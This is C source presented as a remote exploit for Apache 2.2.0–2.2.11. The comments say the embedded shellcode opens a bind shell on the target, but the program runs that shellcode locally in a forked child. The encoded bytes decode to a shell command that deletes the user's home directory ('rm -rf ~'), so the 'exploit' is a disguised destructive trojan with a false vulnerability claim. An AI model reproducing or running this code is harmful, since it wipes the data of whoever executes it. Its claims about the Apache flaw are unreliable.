Apache 2.2.0 - 2.2.11 Remote exploit

#include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <unistd.h> #include <stdlib.h> void usage(char *argv[]) { printf("Usage: %s <hostname> <port>\n\n",argv[0]); exit(1); } int main(int argc,char *argv[]) { // we_are_evil_we_are_evil_bindshell_31337_shellcode_in_91_bytes:> char *shellcode= "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50" "\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50" "\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50" "\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50" "\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50" "\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53" "\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80"; int (*sc)()=(int(*)())shellcode; char host[100]; int sd; struct sockaddr_in sin; struct sockaddr_in pin; struct hostent *hp; // assuming PAGE_SIZE==4096 which is the most common case. char *evilreq=malloc(4096); pid_t pid; if (argc!=3) usage(argv); strcpy(host,argv[1]); if ((hp = gethostbyname(host)) == 0) { perror("gethostbyname"); exit(2); } memset(&pin, 0, sizeof(pin)); pin.sin_family = AF_INET; pin.sin_addr.s_addr = ((struct in_addr *)(hp->h_addr))->s_addr; pin.sin_port = htons(atoi(argv[2])); if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } if (connect(sd,(struct sockaddr *) &pin, sizeof(pin)) == -1) { perror("connect"); exit(3); } printf("Connected, sending out the evil request...\n"); // prepare teh evil request sprintf(evilreq,"GET / HTTP/1.0\nAccept-Encoding: x-compress; x-zip\nCache-Control: max-age=-12312312%%s%91s\n\n",shellcode); if (send(sd, evilreq, strlen(evilreq), 0) == -1) { perror("send"); exit(1); } printf("Waiting some seconds to see if we got shell...\n"); pid=fork(); if (pid==0) {close(2);sc();exit(0);} else { sleep(2); if (sd) { printf("Now type nc %s 12345 to see if you've got shell there\n",argv[1]); close(sd); } } }